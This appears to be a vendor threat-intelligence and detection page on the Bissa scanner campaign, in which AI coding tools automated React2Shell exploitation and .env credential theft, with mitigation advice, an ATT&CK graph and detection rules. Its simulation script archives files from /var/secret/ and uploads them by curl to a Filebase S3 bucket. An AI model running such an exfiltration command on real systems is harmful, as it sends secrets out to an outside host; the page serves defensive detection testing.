Bissa Scanner Exposed: AI-Assisted Mass Exploitation and Credential Harvesting
Follow 
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
An exposed server revealed a large-scale operation that used the Bissa scanner platform, Claude Code and OpenClaw to automate exploitation of internet‑facing targets via a React2Shell vulnerability (CVE‑2025‑55182). The campaign harvested millions of .env files containing high‑value credentials from AI, cloud, payment and messaging services. Collected data were uploaded to a public S3 bucket on Filebase for further use. The operation targeted organizations in financial, cryptocurrency and retail sectors.
Investigation
Analysts recovered over 13,000 files showing the workflow for scanning, exploiting, validating and prioritising victim environments. Logs confirmed more than 900 successful compromises using the React2Shell exploit. Telegram bots were used for real‑time alerting, linking each hit to victim details. The scanner also contained a module for a WordPress W3 Total Cache vulnerability (CVE‑2025‑9501) though no successful exploitation was observed.
Mitigation
Patch vulnerable applications and frameworks promptly, especially the React2Shell and WordPress W3 Total Cache components. Move secrets out of .env files into dedicated secret managers and rotate credentials regularly. Harden cloud metadata access and enforce least‑privilege RBAC. Monitor outbound traffic to detect unauthorized uploads to external storage services.
Response
Implement detection rules for exploitation of CVE‑2025‑55182 and unauthorized S3 uploads. Block known malicious domains and Telegram bot communications. Conduct forensic analysis of compromised hosts to locate residual payloads and remove them. Notify affected users and rotate any leaked credentials immediately.
"graph TB %% Class definitions classDef technique fill:#ffcc99 classDef tool fill:#cccccc classDef action fill:#99ccff classDef operator fill:#ff9900 %% Nodes tool_bissa_scanner["<b>Tool</b> – <b>Name</b>: Bissa scanner<br/><b>Purpose</b>: Perform massive active scanning using target feeds"] class tool_bissa_scanner tool tech_T1595_002["<b>Technique</b> – <b>T1595.002 Active Scanning: Vulnerability Scanning</b><br/><b>Description</b>: Scans Internetu2011facing hosts to find vulnerable services"] class tech_T1595_002 technique tech_T1190["<b>Technique</b> – <b>T1190 Exploit Publicu2011Facing Application</b><br/><b>Description</b>: Exploits vulnerable web applications to gain initial access"] class tech_T1190 technique tool_react2shell["<b>Tool</b> – <b>Name</b>: React2Shell (CVEu20112025u201155182)<br/><b>Function</b>: Provides remote code execution via crafted React payload"] class tool_react2shell tool tech_T1210["<b>Technique</b> – <b>T1210 Exploitation of Remote Services</b><br/><b>Description</b>: Executes payload on remote services to obtain code execution"] class tech_T1210 technique tech_T1211["<b>Technique</b> – <b>T1211 Exploitation for Defense Evasion</b><br/><b>Description</b>: Uses vulnerabilities to bypass defenses and stay hidden"] class tech_T1211 technique tech_T1552_001["<b>Technique</b> – <b>T1552.001 Unsecured Credentials: Credentials In Files</b><br/><b>Description</b>: Harvests credentials stored in configuration files such as .env"] class tech_T1552_001 technique tech_T1119["<b>Technique</b> – <b>T1119 Automated Collection</b><br/><b>Description</b>: Automates validation, prioritization, and batching of collected data for exfiltration"] class tech_T1119 technique tech_T1102_002["<b>Technique</b> – <b>T1102.002 Web Service: Bidirectional Communication</b><br/><b>Description</b>: Uses web services (Telegram bots) to exchange commands and data"] class tech_T1102_002 technique tool_telegram_bot["<b>Tool</b> – <b>Name</b>: Telegram bots @bissapwned_bot, @bissa_scan_bot<br/><b>Purpose</b>: Commandu2011andu2011control channel"] class tool_telegram_bot tool tech_T1567_002["<b>Technique</b> – <b>T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage</b><br/><b>Description</b>: Uploads stolen archives to cloud storage via web service"] class tech_T1567_002 technique tool_filebase_bucket["<b>Tool</b> – <b>Name</b>: Filebase S3u2011compatible bucket (bissapromax)<br/><b>Purpose</b>: Stores exfiltrated credential archives"] class tool_filebase_bucket tool tech_T1537["<b>Technique</b> – <b>T1537 Transfer Data to Cloud Account</b><br/><b>Description</b>: Moves data to an attackeru2011controlled cloud account for later retrieval"] class tech_T1537 technique tech_T1068["<b>Technique</b> – <b>T1068 Exploitation for Privilege Escalation</b><br/><b>Description</b>: Leverages harvested credentials to gain higher privileges and lateral movement"] class tech_T1068 technique %% Connections tool_bissa_scanner –>|performs| tech_T1595_002 tech_T1595_002 –>|identifies vulnerable services| tech_T1190 tech_T1190 –>|uses| tool_react2shell tool_react2shell –>|delivers payload to| tech_T1210 tech_T1210 –>|enables| tech_T1211 tech_T1211 –>|allows| tech_T1552_001 tech_T1552_001 –>|feeds into| tech_T1119 tech_T1119 –>|sends data via| tech_T1102_002 tech_T1102_002 –>|implemented by| tool_telegram_bot tech_T1102_002 –>|exfiltrates to| tech_T1567_002 tech_T1567_002 –>|stores in| tool_filebase_bucket tool_filebase_bucket –>|enables| tech_T1537 tech_T1537 –>|supports| tech_T1068 "
Attack Flow
Detections
Possible CVE-2025-55182 (Unauthenticated RCE in React Server Components) Exploitation Attempt (via webserver)
View
Possible CVE-2025-55182 (Unauthenticated RCE in React Server Components) Exploitation Attempt (via proxy)
View
Possible C2 Communications Over HTTP To Direct IP With Uncommon Port (via proxy)
View
Data Exfiltration via S3-Compatible Filebase [Proxy]
View
Data Exfiltration via S3-Compatible Filebase [AWS Cloudtrail]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
-
Attack Narrative & Commands:
The adversary has harvested a set of confidential documents from/var/secret/. To avoid detection, they first archive the data into a password‑protected ZIP file, then usecurlto upload the archive directly to the Filebase S3 endpoint through the corporate forward proxy. The proxy logs the full request URL, which matches the detection rule. -
Regression Test Script:
#!/usr/bin/env bash set -euo pipefail # 1️⃣ Stage data (T1074) STAGE_DIR="/tmp/staged_data" mkdir -p "$STAGE_DIR" cp -r /var/secret/* "$STAGE_DIR/" # 2️⃣ Archive data (T1560.001) – password protected zip ARCHIVE="/tmp/exfil_archive.zip" ZIP_PASSWORD="P@ssw0rd!" zip -r -P "$ZIP_PASSWORD" "$ARCHIVE" "$STAGE_DIR" > /dev/null # 3️⃣ Exfiltrate via Filebase S3 endpoint (T1020) # Assume the proxy is reachable at http://proxy.company.local:3128 FILEBASE_URL="https://s3.filebase.com/mybucket/exfil_archive.zip" curl -x http://proxy.company.local:3128 -T "$ARCHIVE" -H "Host: s3.filebase.com" -H "User-Agent: Mozilla/5.0" "$FILEBASE_URL" --silent --output /dev/null echo "Exfiltration attempt completed." -
Cleanup Commands:
# Remove staged files and archive rm -rf /tmp/staged_data /tmp/exfil_archive.zip # (Optional) Flush proxy connections if needed # For Squid: squid -k rotate echo "Cleanup finished."